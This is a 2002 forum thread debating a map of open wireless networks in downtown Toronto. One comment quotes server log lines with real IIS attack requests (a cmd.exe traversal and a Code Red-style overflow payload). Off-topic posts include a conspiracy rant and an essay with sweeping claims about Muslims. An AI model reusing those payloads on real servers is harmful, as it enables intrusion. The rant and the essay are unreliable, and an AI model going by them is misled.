Toronto, The Naked City

PunWork writes "In an effort to promote wireless network security, Toronto consulting firm IpEverywhere (pun intended) has published a map of downtown Toronto, showing the location of both encrypted and unencrypted ('naked') wireless networks. Is this going to help spread awareness, or is this just going to encourage people to abuse the (apparently) ignorant? The Toronto Star has a story about the map and the consulting firm here."

Easy to build such a map in Toronto

Just climb on top of the CN tower with your scanning gear.

Re:Easy to build such a map in Toronto

[Jetson]

That would tell you there are lots of nodes, but not where they are located at street level. Your "map" would show hundreds of nodes *AT* the CN Tower since that's where you were standing when you connected to them.

eh?

[digitalsushi]

Toronto consulting firm IpEverywhere (pun intended)

I dun get it.

Re:eh?

Well, it could be IP as in the protocol, or IP as in "I. P. Freeley". Does that clear it up for you?

Re:eh?

[Jonny+Ringo]

Well the submitter name is "PunWork". So maybe he just constantly tries to find puns that work. I'll I have to say is don't quit your day job PunWork, whatever that is!

Re:eh?

[EvilAlien]

That is his day job, hence 'PunWork'. Maybe he should quit his day job afterall.

Re:eh?

I dun get it.

Read it out loud: "I Pee Everywhere". Weak pun, but better than nothing.

Re:eh?

[HP+LoveJet]

I'm going to call my consulting company "Hey Everybody I'm A Stupid Moron With An Ugly Face And A Big Butt And My Butt Smells And I Like To Kiss My Own Butt."

Re:eh?

The pun I see in IpEverywhere is the good ol' elementary school prank...

Say the letters "I" "P" and then say "Everywhere" ...get it?

More commonly little kids will taunt another kid to say I P Freely, but I forgot how they get them to say it... heh, sorry, even I am old when I think about how long ago kids used it...

Re:eh?

IPAnywhere

"I pee anywhere"

"I urinate in any location" ... christ... do puns have to be spelled out for slashdot readers these days or what?

Re:eh?

Hey, Flaaaaaaaaaaaaanders...

Re:eh?

OK wise guy, explain IBM then.

Re:eh?

[ActiveSX]

Really? I Pee Everywhere? Naked Wireless? Get it? *Nudge* *Nudge*

fp

[mclaren_1010]

fp

Get real..

[unicron]

Like Toronto's local wardrivers don't have maps that blow that one out of the water.

Re:Get real..

[unicron]

Follow up: Wardrive map of the North Pole:

http://www.securitytribe.com/

Navigate it to the wardriving section.

Santa seems pretty lax on security, you'll notice.

Re:Get real..

[BitchAss]

who has sites? I've got this one

Terror Alert and The Posse Comitatus Act of 1878

"Sources: U.S. going to 'high' terror alert"

Now, don't confuse this alert with Canary! This is more of a mustardy gold. Now if we go to DEFCON 5 "BLOOD," that means there is a really bad alert. It means we know for sure that there will be terrorism because the CIA contracted it to happen. We have been elevated from the elevated level.

Now, when we are in LOW mode, don't bother even looking for terrorists because they don't exist then because Tom Ridge hasn't seen any, and the payouts are sufficient at the moment to prevent any and all blowback.

In my own PROFESSIONAL opinion, we should have a few more levels, brown a level called SHITTY, color BROWN (could be called DOO DOO for the youngsters) , and yet another YELLOW alert called PISSED (which really represents the modality of the morons, totalitarians and fascists hiding in bunkers coming up with this crap - pissed drunk).

Now, enemies of the state are dubbed enemy combatants and habeus corpus of citizens can be suspended and trivialized even more than usual! More fun! Also, kiss amendment 1,2 and 5 away. (no you cant talk about it, no you cant have a gun and no, your attorney client privledge issupspended) Also kiss ***"The Posse Comitatus Act of 1878 " bye bye!

The Posse Comitatus Act of 1878"
20 Stat. L., 145

June 18, 1878

CHAP. 263 - An act making appropriations for the support of the Army for the fiscal year ending June thirtieth, eighteen hundred and seventy-nine, and for other purposes.

SEC. 15. From and after the passage of this act it shall not be lawful to employ any part of the Army of the United States, as a posse comitatus, or otherwise, for the purpose of executing the laws, except in such cases and under such circumstances as such employment of said force may be expressly authorized by the Constitution or by act of Congress; and no money appropriated by this act shall be used to pay any of the expenses incurred in the employment of any troops in violation of this section And any person willfully violating the provisions of this section shall be deemed guilty of a misdemeanor and on conviction thereof shall be punished by fine not exceeding ten thousand dollars or imprisonment not exceeding two years or by both such fine and imprisonment.

10 U.S.C. (United States Code) 375

Sec. 375. Restriction on direct participation by military personnel:

The Secretary of Defense shall prescribe such regulations as may be necessary to ensure that any activity (including the provision of any equipment or facility or the assignment or detail of any personnel) under this chapter does not include or permit direct participation by a member of the Army, Navy, Air Force, or Marine Corps in a search, seizure, arrest, or other similar activity unless participation in such activity by such member is otherwise authorized by law.

18 U.S.C. 1385

Sec. 1385. Use of Army and Air Force as posse comitatus

Whoever, except in cases and under circumstances expressly authorized by the Constitution or Act of
Congress, willfully uses any part of the Army or the Air Force as a posse comitatus or otherwise to
execute the laws shall be fined under this title or imprisoned not more than two years, or both.

Editor's Note: The only exemption has to do with nuclear materials (18 U.S.C. 831 (e)

But at the Pentagon, at the Federal Emergency Management Agency (FEMA) and at the new Office of Homeland Security (Now being elevated to a 170,000 strong super Agency), officials have been busy updating those plans, particularly the way they relate to using the military as a kind of domestic national police for "continuity of government." For those unaware of fed-speak, this means the protecting of elected officials and bureaucrats from the rest of us, who are viewed as the potential enemy.
Many people feel that the Posse Comitatus act of 1878, might protect them from a police state combining the military and civil law enforcement, with heavy managerial input by the US Department of Justice. But laws are already on the books authorizing martial law, including Section 32CFR 501.4** of the Code of Federal Regulations. These are the rules written by unelected bureaucrats that govern our lives.

In broad based terms, the CFR simply states: "Martial law depends for its justification upon public necessity." **(If you have Adobe Acrobat Reader installed you can view 32 CFR 501.4 in PDF format by double clicking this hyperlink with your left mouse button. You can download by right clicking and then left clicking.) (http://www.dojgov.net/32_CFR_501.pdf)

And let us not forget that vast emergency federal powers by decree dates at least to John Kennedy, who issued a raft of such orders during the Cold War. You can read recent Executive Orders and look up the topics of all modern Executive Orders by going to http://www.archives.gov/search/index.html National Archives and Records. They are difficult to pull up and include Executive Orders 12919, 12656 and 13228. In force today, they reveal how easily our individual liberties and constitutional government can be set aside. For downloads of documents, Right Click on the above Executive Order hyperlinks and Left Click to view or download.

[ http://www.dojgov.net/12919.pdf , http://www.dojgov.net/12656.pdf ; http://www.dojgov.net/13228.pdf ]

With constitutional government "temporarily" placed in the garbage heap, the American people would be subject to direct control by unelected bureaucrats scrambling to shore up a jack boot heel on the dreams of our Founding Fathers.

"Congress shall make no law.." BWAHAHAHAHAH , boy, I'm going to WHOP you!

Flash?

Bah!

its not an "or" situation

[deft]

both will happen.

1. the idiots will try and hack and abuse.
2. the companies will slowly gain awareness, try to figure out how to secure themsleves, secure funding, initiate sucurity protocols, fix holes, etc.

gee, i wonder who will get going first. the company or the idiots.

Re:its not an "or" situation

[rkwright]

I agree. If you take a look at other areas in computer security (for example, Windows 2000 servers and insecure IIS setups), the actual breakins/worms/etc. have (albeit slowly) caused more admins to lock down their Win2K servers. It has also caused a change for the better with the vendor (Microsoft) in that the next version of their server software (.Net Server 2003) will initially be relatively locked down, and the admin who is configuring the server will have to specifically turn services on. Thus, abusers and intruders have a necessary place by providing the motivation for improving security.

However, with so many consumer-based 802.11 access points out there, I doubt that Joe Homeoffice will even realize how to lock down their networks. In this case, the vendors should start by having as much default security as possible, as well as some helpful reading in the instruction manuals for how to secure your wireless setup.

Re:its not an "or" situation

[Jucius+Maximus]

"However, with so many consumer-based 802.11 access points out there, I doubt that Joe Homeoffice will even realize how to lock down their networks. In this case, the vendors should start by having as much default security as possible, as well as some helpful reading in the instruction manuals for how to secure your wireless setup."

I agree. There is a similar lack of security on ResNets by clueless students. Basically at the start of each semester, some of by buddies scan the resnets for insecure machines and print out some security documentation on the printer of the insecure person or deposit a helpful security document on the person's Windows desktop. (I don't actually do this because I don't live in university residence.)

If people did that on wardrives, you might call it 'drive-by security consulting' .

Re:its not an "or" situation

[earlytime]

here's what will happen:
the hackers will get the maps and start mucking with wireless nets in toronto. As the owners of the wireless nets notice that they're being abused, they'll call security firms hoping they will fix the problems.
Companies with weak security don't usually know they have weak security, and they don't read up on security news, so they won't know that ipeverywhere has "assisted" hackers in finding their insecure wireless network. But if they do find out, then they'll realize that the security firms and the hackers are working hand-in-hand to get $$$ from the companies. They may not be complicit, but they are symbiotic. This is just another case along the lines of what gweeds was talking about at HK2K
, but you knew that already..... right?

Re:its not an "or" situation

[Dread_ed]

1. the idiots will try and hack and abuse.
2. the companies will slowly gain awareness, try to figure out how to secure themsleves, secure funding, initiate sucurity protocols, fix holes, etc.

WOOOOHOOOO!!!!!

The sooner that this happens the better.

Now all my laid off IT buddies can get back to work securing the wireless networks for all the companies that fired them last year. Course, maybe some of them could pose as "the idiots," (see above) thereby hastening and ensuring their return to gainful employment!

Maybe then they'll lay off buggin' me for the $20 I borrowed in highschool that I never paid back.

"Sophocles...Euripides...Meet my cousin---Testacles."

Re:its not an "or" situation

[Phroggy]

Joe Homeoffice certainly doesn't know how to lock down his Web server.

adsl-68-20-215-135.dsl.chcgil.ameritech .net - - [10/Sep/2002:12:47:47 -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+ dir" 404 83

dsc01.hoi-tx-6.rasserver.net - - [10/Sep/2002:13:19:58 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u685 8%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858% ucbd3%u7801%u9090%u9090%u8190%u00c3%u
0003%u8b00% u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 328

207.248.53.14 - - [10/Sep/2002:18:38:14 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u685 8%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858% ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u5 31
b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 328

Remeber this as we approach 9/11/2002

[Strom+Thurmond+(R-SC]

By September 10 of last year most Americans had probably grown indifferent to the so-called "culture wars," that decades-long debate over the nature, values, and history of Western and American civilization. Issues such as "political correctness" had passed into fodder for sit-com jokes, and the continuing wrangle over school curricula and textbooks no doubt struck many Americans as a Lilliputian spat of concern only to pointy-head academics, pontificating pundits, and blustering talking heads. Yet the attacks onSptember 11 violently exposed the destructive consequences of the various intellectual and academic movements that had become the received wisdom and dominant orthodoxy of our cultural and political gatekeepers. For example, the doctrine of cultural relativism -- the idea that all cultures are equally valuable, that no basis exists for saying one culture is better than another, and that to say one is better is insensitive ethnocentrism or even racism -- on September 11 was exposed as a dangerous lie. The perpetrators of that mass murder were the products of a specific civilization's dysfunctional view of the world, a civilization whose values are opposed to Western ones such as sex equality, liberal democracy, individual autonomy and freedom, and a limited political role for religion. We hear endlessly about the American fear of the "other," but the WTC murderers were the real cultural chauvinists, so fanatically convinced of the rightness of their way of life that they were willing to kill themselves and 3000 innocents, including fellow Muslims -- an act sanctioned by numerous verses in the Koran.

The cultural relativists of course stepped forward to assure us that, despite those verses, Islam really is a religion of "peace" and "tolerance," but they neglected to explain that the price of "peace" and "tolerance" is the individual's political and social submission to Islam's religious authority. Apologists also explained that the attackers were in fact deviants who had distorted Islamic values. Perhaps, but judging from the spontaneous demonstrations of joy over the attacks that took place throughout the Arab world, and considering the thousands of madrassas still teaching those same "distortions" with government support, apparently millions of Muslims are deluded about their own culture and religion.

Then we were lectured about the "moderates" in the Islamic world that we should support and encourage rather than reducing to "clash of civilizations" paradigms. Yet no one questioned why these so-called "moderates" continually refuse to abandon their inveterate hatred of Israel and sympathy for terrorism evident in their moral and financial support of Palestinian murderers, and in the inevitable "but" that always follows their perfunctory condemnations of the latest slaughter of the innocents. Yes, there exist Islamic moderates who want their civilization to enter the 21st century, but whether or not Islamic culture will or can adapt to the modern, that is, Western way of secularism and individual freedom is a question ultimately to be answered by Muslims themselves. But the question itself is meaningless without some recognition that the Western way is simply superior in key respects, for it creates the greatest freedom and prosperity for the greatest number of individuals; and that cultures that suppress individual freedom and keep millions of its people in penury aren't just different, but inferior.

Next, September 11 demonstrated the bitter fruit of the doctrine of anti-Americanism rife not just in the Middle East and Third World but among many Europeans and Americans themselves. In the months after the attack numerous American and European intellectuals opined that America had in one way or another "deserved" the attacks, that it was reaping the bitter harvest of its numerous imperialist and racist crimes. This irrational superstition, whose ultimate origins lie in communist propaganda, has become a set of cliches and an unthinking reflex fueled by self-loathing, envy, and resentment. Worse, it has no basis in the facts of history.

The truth is, no society in history wielding the cultural, economic, and military power possessed by the United States has been as restrained in using that power. Even if one accepts the usual anti-American indictment -- Chile, Nicaragua, Vietnam -- these alleged offenses pale beside the good America has done in the world, and the blood and treasure it has lost in fighting tyrannies like Nazism, Japanese militarism, and communism. We hear much about Vietnam, but the abandonment of our allies there meant that Vietnam today looks more like the starving police state of North Korea than a free and prosperous South Korea. But the real refutation of America's supposed evil is the sheer numbers of immigrants who risk their lives to live among their presumed oppressors.

Particularly revealing, however, was the outburst of anti-Americanism in Europe that followed a brief few weeks of sympathy for our loss. Nations whose toll of colonial oppression and death in the Third World dwarfed our own now began to lecture us on our crimes. Envy, resentment, post-colonial guilt, and pride wounded by the spectacle of a nation of déclassé cast-offs and immigrants dominating the world found expression in stale cliches about oafish American "cowboys" who lacked the Europeans' sophisticated, nuanced understanding of world affairs. What we should have learned from this shameless display is that the old NATO Cold War consensus is irrelevant in a world dominated by American power, and that a morally exhausted Europe is our "friend" as long as it can spend money on lavish social welfare programs rather than on the military muscle that would justify its global pretensions.

The third cultural disease exposed by 9/11 is the therapeutic sentimentalism that compromises our actions and policies. The thought that anybody, even the Al Qaeda psychopaths, might be made to suffer occasioned all manner of anguished hand wringing. The detainees in Cuba -- murderers one and all -- were fussed over as though they were wayward teenagers caught "experimenting" with drugs. The military action in Afghanistan was hemmed in by demands that no inadvertent deaths occur, something impossible in the "fog" of war. Efforts to protect our citizens against further attack were hamstrung by civil-libertarian fundamentalists who apparently believe any number of American dead is an acceptable price to pay in order to avoid hurting the feelings of an Arab immigrant. A librarian in Boulder who had festooned her library with multicolored plastic penises ordered an American flag taken down lest someone be made "uncomfortable." And everywhere on display was, and still is, our peculiar delusion that peace and order can be created and protected without violence and suffering and the unforeseen, tragic consequences that always attend the use of force.

Finally, and most important, the rot of moral relativism running throughout the intellectual class continues to manifest itself. We were not to blame anyone, as the National Education Association's recent school curricula instructed teachers. We are not to use words like "good" and "evil," those outdated superstitions from our unenlightened past. The President's use of the phrase "axis of evil" to describe three tyrannical, terror-nurturing states aroused all manner of indignation from Eurocrats and liberal pundits, who scoffed at his simplistic and reductive characterization of terror. These were the same people who sneered at Ronald Reagan when he called the Soviet Union an evil empire -- to the cheers of millions of oppressed Eastern Europeans who knew exactly what he was talking about. Perhaps the stupidest example of this moral idiocy was the British editor who forbade the use of "terrorist" to describe the murderers, since "one man's terrorist is another man's freedom fighter." But after all the spineless tweaking and sophistical nuancing is done, the simple fact remains that murderers of the innocent are evil. A culture that has trouble recognizing that fact is a culture in trouble.

Battling this toxic brew of cultural and moral relativism, therapeutic sentimentalism, and malevolent anti-Americanism is what the culture wars are all about. In the first few months after 9/11 it seemed that the tide had turned against these noxious ideas. Flags were being flown without embarrassment, church pews were more crowded, public recognition of America's unique achievement in giving freedom and prosperity to the greatest number ever of ordinary people was freely celebrated. But since then the old bad habits seem to be creeping back, as evidenced by the dithering and second-guessing over Iraq and its homicidal maniac of a leader. After the sentiment and spectacle of the anniversary ceremonies of 9/11 is done, the question will remain whether or not we have learned enough to make sure 9/11 never happens

Ironically...

The map on the site doesn't cover Toronto's nude beach at Hanlan's point.

Re:Ironically...

Nude beach in Toronto? Seems pretty cold to me. It must be where people only wear 2 layers of clothing. zing.

Re:Ironically...

Hmm... You must be one of those idiot that bring skiing equipment here to Toronto in the middle of July.

The weather today in Toronto is 34 celcius, that's 90F plus.

Re:Ironically...

i work tech support for a company in waterloo . And deal mainly with americans..

If i only had a tape recorder for half of the telephone calls.

I truly think most americans beleive there is no other country than the US of A..

sad....

Re:Ironically...

Dude, that is a gay nude beach. Consider this a warning.

Re:Ironically...

[ergo98]

Mind you we Canadians have bought into the Northern perception as well. A recent National Post article was hyperbolizing about rising water levels, and how Toronto would soon be "Venice North". Imagine their suprize when an alert reader notified them that Toronto is actually further South than Venice. Indeed, Toronto is further South than the significant majority of Europe, etc.

Re:Ironically...

It is *NOT* a gay nude beach. It is a nude beach which happens to be commonly frequented by gays - but certainly not exclusively gays. There are plenty of straight nudists on Hanlan's.

Re:Ironically...

Never lie on your stomach on that beach! I found out the hard way.

Hot fast & dirty

Creating ActiveX Components
See Also

Component software development cuts programming time and produces more robust applications, by allowing developers to assemble applications from tested, standardized components. The move to component software, sparked by the success of products like Microsoft Visual Basic, is one of the most prominent trends in the software industry.

Microsoft has led the effort to define an open, extensible standard for software interoperability. The Component Object Model (COM), including Automation and the ActiveX specification, makes it possible for software components you create to work smoothly with software components you buy off the shelf.

Visual Basic makes ActiveX component creation happen. ActiveX controls, ActiveX Documents, code components, and applications that provide objects -- Visual Basic gives you the tools to rapidly create, debug, and deploy software components.

Getting Started
Before you begin, you should know how to use class modules to define new classes, how to create objects from classes, and how to use ActiveX components. These subjects are discussed in "Programming with Objects" and "Programming with ActiveX Components," in the Visual Basic Programmer's Guide.

Chapters
ActiveX Components
Outlines what you can do with Visual Basic's component software features.

Creating an ActiveX DLL
Provides step by step procedures that get you off to a running start with in-process debugging, multiple projects, global objects, object lifetime concepts, and circular references.

Creating an ActiveX Exe Component
Provides step by step procedures that introduce threads, events in class modules, call-backs, and out-of-process debugging.

Creating an ActiveX Control
Provides a series of step by step procedures that create a simple control. Introduces ActiveX control concepts, raising events, debugging design-time behavior, and property pages.

Creating an ActiveX Document
Provides a series of step by step procedures that create a simple ActiveX document, and demonstrate ActiveX document concepts, navigation, properties and methods, menus, and debugging techniques.

General Principles of Component Design
Contains information of importance to all component designers, including terminology, concepts, instancing for class modules, polymorphism, and object models.

Debugging, Testing, and Deploying Components
Contains more general information, such as setting up test projects, debugging features, adding Help, version compatibility, and localization.

Building Code Components
Takes OLE servers into a new world, providing in depth discussions of in-process and out-of-process components, threading, instancing, call-backs, and events.

Building ActiveX Controls
Contains in-depth explanations of how Visual Basic ActiveX controls work, what features you can implement, subtleties of debugging, discussions of implementation techniques, and all the other things you expect of a cool new feature.

Creating Property Pages for ActiveX Controls
Provides in-depth discussion of property pages, including implementation techniques and design guidelines.

Building ActiveX Documents
Provides in-depth discussions of terminology, concepts, Internet features, navigation, debugging, migrating from forms, and in-process vs. out-of-process implementation.

Building Data Sources
Provides in-depth discussion and step-by-step procedures for creating ActiveX components that can act as data sources.

ActiveX Component Standards and Guidelines
Contains updated guidelines for object naming, component shutdown, implementing collections and Application objects, and other object model issues.

That's lame

[Jonny+Ringo]

Unencrypted networks are now referred as "naked" networks? They just called it that to get more people to read it.

Maybe someone should make a new insecure Linux distro called "Naked Linux". It will be great for the desktop to compete with Windows whom has always been naked. (Maybe that's Red Hats secret Plan). In the mean time Windows is trying to get dressed. Stupid 2 legged pants!

Re:That's lame

[Soko]

It will be great for the desktop to compete with Windows whom has always been naked. (Maybe that's Red Hats secret Plan).

Well, the latest RedHat beta is now called "null", so you never know...

Soko

Re:That's lame

[(trb001)]

Oh, would that distro come pre-installed with this?

--trb

Re:That's lame

[icejai]

Actually, there's an online news broadcast site thenakednews.com based in Toronto where the anchors slowly take all their clothes off while they report news.

Its obvious!

[FortKnox]

Is this going to help spread awareness, or is this just going to encourage people to abuse the (apparently) ignorant?

I'd put my life savings on the aduse of the ignorant.

Lets see, annually, people get viruses from opening attachments in their emails. How many people, do you think, get re-infected because of ignorance?

How many people go to windowsupdate.microsoft.com for security patches?

Yeah, most IT people know what they are doing, and don't do anything foolish with their security, but you know that a lot of average users are learning to setup networks, and setting up a wireless network isn't exactly rocket science.

I anticipate a lot of abuse in the city of Toronto...

Re:Its obvious!

Yeah, most IT people know what they are doing, and don't do anything foolish with their security, but you know that a lot of average users are learning to setup networks, and setting up a wireless network isn't exactly rocket science.
HAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHAHA!

oh man that is really funny!

Most IT people dont know squat. and very very few of them know much about, let alone even understand security.

If your statement were true then corperate break ins and virus's would be a much smaller problem.. 99% of all virus attacks I get are from INSIDE corperate coming from the T1 ties to the NOC not from any of my users or the internet gateway I have. Whenever there's a discussion about Virus scanners and basic virii security.. over 1/2 the IT professionals on the conference call have no idea how to ensure that all the machines are up to date or protect their networks.

Also, I have had to resort to firewalling the corperate side to protect my network... Yes, the TRUSTED corperate network T1 tie is firewalled by me to keep out attackers and virii.

I am one of about 700 IT professionals in my corperation... and I have to spend valuable time securing my network from the bungling boobs that this company hired.

Re:Its obvious!

[quantaman]

Hmmm... Lets see 11:21 by my time, I think that would make it 1:21 in Toronto? Yep, I think your company does need to get rid of some of those bungling boobs they have working on their network ;)

Hey, Wow!

Who gives a shit?

map here

http://www.nakedwireless.ca/winudcol.htm

Spammers

[The+Turd+Report]

I wonder how long it will take spammers to clue in on this? It is a wonderful deal for spammers; as they are untraceable via this method. There are steps that people running these networks could do to prevent spammers, but still allow legit users. But, you all know how well some admins look after security...

Re:Spammers

[kavau]

Drive-by spamming.

Ugh...

Re:Spammers

[EvilAlien]

They spammers are already all over this like a fat kid on a smartie. Check out my comment below for URLs n stuff.

Re:Spammers

[Jucius+Maximus]

"I wonder how long it will take spammers to clue in on this? It is a wonderful deal for spammers; as they are untraceable via this method. There are steps that people running these networks could do to prevent spammers, but still allow legit users. But, you all know how well some admins look after security..."

Damn, stop giving them ideas!

Re:Spammers

[jeffy124]

hmmm. I only tried submitting an article dealing with that topic last week

Re:Spammers

[The+Turd+Report]

I reposted my ideas on securing WLANs agains spammers in to this article.

... obligitory simpsons reference

[edrugtrader]

i don't quite understand this... lets do an interview with the author.

Mr. Freely? come on guys, I.P. Freely!?

Re:... obligitory simpsons reference

Why is this modded offtopic? I find it both amusing and relevant!

VANCOUVER IS SO MUCH COOLER THAN TORONTO

No doubt.

Computer viruses go airborne

[jhines0042]

People get viruses delivered the their computers via email, the net, etc...

What is to stop viruses now becoming "airborne" and people who use an open wireless network unwittingly picking them up or (knowingly or unknowingly) transmitting them into open wireless networks?

Surely most people who wardrive would be smart enough to avoid them through various means... but most people who use computers are fairly clueless about security and virus protection.

Any known cases of wifi virus infection?

Re:Computer viruses go airborne

[Cecil]

For a virus to be able to infect your system simply by sending a network packet to your machine, that requires that someone first finds a remote root vulnerability within the network stack of your operating system.

IIRC, This has happened, and may happen again, but it's REALLY REALLY UNTHINKABLY RARE. Most network stacks have been rock solid for 30 or 40 years.

So yes, it's a nice, scary theory. But I wouldn't bet on it happening any time soon.

Re:Computer viruses go airborne

This is bad. If aliens are running a SETI project, they might get infected. We wouldn't want to start an interstellar war that soon, now do we?

Re:Computer viruses go airborne

[jhines0042]

Nice scary theory, but...

Lets say I have a computer that is infected with a virus. This virus (say Klez) looks for network shared drives to copy itself to.

I also have a 802.11b network.

Someone has a laptop with a shared network drive with, for some reason (ignorance), full permissions turned on.

Said person logs into my network because they are nearby and their network card finds the network (windows XP does this nicely) and then Klez, running on my machine, finds your network drive and copies itself there as "readme.txt.exe" or something else like that.

Could be more likely than you might want to think. Only involves two stupid people in proximity who have technology they don't understand to have it happen. I can't even swing a dead keyboard* and not hit two idiots with Technology around here.

(*swinging dead cats is just too hard)

Re:Computer viruses go airborne

That's not how you'd do it...

The idea is that normally a virus' only entry point into a 'safe' coprorate network is via some sort of service (such as email, or web).

Imagine you have access to a company's LAN, and because of poor security, you are able to access files of a computer over NetBIOS. All you need then is to replace some file on a computer and you have implanted a virus via airwaves.

It's actually more of a Trojan at that point, but still...

It's not so far fetched.

Re:Computer viruses go airborne

[BitchAss]

There is a virus like the one you mention. I had an incident with the FunLove virus last year. Good fun.

Re:Computer viruses go airborne

[Kallahar]

Do you have ANY idea how viruses actually spread? the medium is irrelevant.

Travis

Yuck!

When I read that headline, my first though went out to several Toronto women I know... Naked... Ick! May God (or whatever deity you believe in) have mercy on our souls if that were to happen.

Up your ass with a piece of glass

Platform SDK: Remote Procedure Call (RPC)

RpcServerUseAllProtseqsEx

The RpcServerUseAllProtseqsEx function tells the RPC run-time library to use all supported protocol sequences for receiving remote procedure calls.

RPC_STATUS RPC_ENTRY RpcServerUseAllProtseqsEx(
unsigned int MaxCalls,
void* SecurityDescriptor,
PRPC_POLICY Policy
);

Parameters
MaxCalls
Backlog queue length for the ncacn_ip_tcp protocol sequence. All other protocol sequences ignore this parameter. Use RPC_C_PROTSEQ_MAX_REQS_DEFAULT to specify the default value. See Remarks.
SecurityDescriptor
Pointer to an optional parameter provided for the Windows XP/2000/NT security subsystem. Used only for ncacn_np and ncalrpc protocol sequences. All other protocol sequences ignore this parameter. Using a security descriptor on the endpoint in order to make a server secure is not recommended. This parameter does not appear in the DCE specification for this API.
Policy
Pointer to the RPC_POLICY structure, which allows you to override the default policies for dynamic port allocation and binding to network interface cards (NICs) on multihomed computers (computers with multiple network cards).
Return Values

Value Meaning
RPC_S_OK The call succeeded.
RPC_S_NO_PROTSEQS There are no supported protocol sequences.
RPC_S_OUT_OF_MEMORY Sufficient memory is not available.
RPC_S_INVALID_SECURITY_DESC The security descriptor is invalid.

Remarks
The parameters and effects of RpcServerUseAllProtseqsEx subsume those of RpcServerUseAllProtseqs. The difference is the Policy parameter, which allows you to restrict port allocation for dynamic ports and allows multihomed machines to selectively bind to specified NICs.

Setting the NICFlags field of the RPC_POLICY structure to zero makes this extended API functionally equivalent to the original RpcServerUseAllProtseqs, and the server will bind to NICs based on the settings in the system registry. For information on how the registry settings define the available Internet and intranet ports, see Configuring the Windows XP/2000/NT Registry for Port Allocations and Selective Binding.

Note The flag settings in the Policy field are effective only when the ncacn_ip_tcp or ncadg_ip_udp protocol sequence is in use. For all other protocol sequences, the RPC run-time ignores these values.

A server application calls RpcServerUseAllProtseqsEx to register all supported protocol sequences with the RPC run-time library. To receive remote procedure calls, a server must register at least one protocol sequence with the RPC run-time library.

For each protocol sequence registered by a server, the RPC run-time library creates one or more endpoints through which the server receives remote procedure call requests. The RPC run-time library creates different endpoints for each protocol sequence. The endpoint name is generated by the RPC run time or the operating system. For example, for ncacn_ip_tcp, the port number is dynamically determined by the RPC run time, depending on availability and registry settings.

Note Using the RpcServerUseAllProtseqsEx function does not cause the server to listen on the following protocol sequences:

Note ncacn_nb_nb

Note ncacn_nb_tcp

Note ncacn_nb_ipx

Note ncadg_mq

Note ncacn_at_dsp

Note ncacn_http.

Note To listen on any of those protocol sequences, each sequence must be selected individually.

For MaxCalls, the value provided by the application is only a hint. The RPC run time or the Windows Sockets provider may override the value. For example, on Windows XP Personal and Professional, or Windows 2000 Professional, the value is limited to 5. Values greater than 5 are ignored and 5 is used instead. On Windows XP/2000 Server, Advanced Server, and Datacenter Server the value will be honored.

Applications must be careful to pass reasonable values in MaxCalls. Large values on Server, Advanced Server, or Datacenter Server can cause a large amount of non-paged pool memory to be used. Using too small a value is also unfavorable, as it may result in TCP SYN packets being met by TCP RST from the server if the backlog queue gets exhausted. An application developer should balance memory footprint versus scalability requirements when determining the proper value for MaxCalls.

To selectively register protocol sequences, a server calls RpcServerUseProtseqEx, RpcServerUseProtseqIfEx, or RpcServerUseProtseqEpEx. See Server-Side Binding for a description of the routines that a server will typically call after registering protocol sequences.

Requirements
Windows NT/2000/XP: Included in Windows NT 4.0 and later.
Windows 95/98/Me: Unsupported.
Header: Declared in Rpcdce.h.
Library: Use Rpcrt4.lib.

See Also
Configuring the Windows XP/2000/NT Registry for Port Allocations and Selective Binding, RpcServerUseAllProtseqsIfEx, RpcServerUseProtseqEx, RpcServerUseProtseqEpEx, RpcServerUseProtseqIfEx

Maps

[NetJunkie]

Which other sites show maps of APs? I'd like to see if my neighbor's is on there. Wide open...default password on the router...

I thought I remember seeing a site once where you could just enter a zip code to get an idea.

Toronto, the most secure city?

[dattaway]

It might be that all these points are simply honeypots.

Did they make tcp connections to find out?

Wireless nodes..

[ldopa1]

Cool, now when I go to Toronto, I have a map of all of the Starbucks downtown...

Re:Wireless nodes..

[Jucius+Maximus]

"Cool, now when I go to Toronto, I have a map of all of the Starbucks downtown..."

You don't need a map. If you're in the core, all you have to do is turn yourself around 360 degrees and you will most likely see a coffe shop, probably a Starbucks or Timothy's (not to be confused with Tim Horton's.)

Re:Wireless nodes..

[Capt.+DrunkenBum]

I got that beat.. On Robson St. in Vancouver, there is a corner with 3 coffee shops, and 2 of them are Starbucks.

Re:Wireless nodes..

[Jucius+Maximus]

"I got that beat.. On Robson St. in Vancouver, there is a corner with 3 coffee shops, and 2 of them are Starbucks."

I can one-up you on that ... in the office tower where I used to work in Toronto, there were 3 coffee shops in the building and two of them were on the same floor.

Re:Wireless nodes..

[rtaylor]

Ok.. I did a 360 at York / Adelaide and saw both a StarBucks, Timothy's, and if you look hard you can see a Tim Hortons.

Re:Wireless nodes..

[rtaylor]

Lol.. I just realized there is another Starbucks and Tim Hortons underground, one story below street level.

So that makes 5 shops within about 150 paces.

Re:Wireless nodes..

[Craig+Davison]

At 5th Avenue Place (formerly Esso Plaza) in Calgary, there's two Second Cups. One's on the ground floor and the other on the second, and you can see both if you stand in a certain spot on the ground floor.

Re:Wireless nodes..

[ergo98]

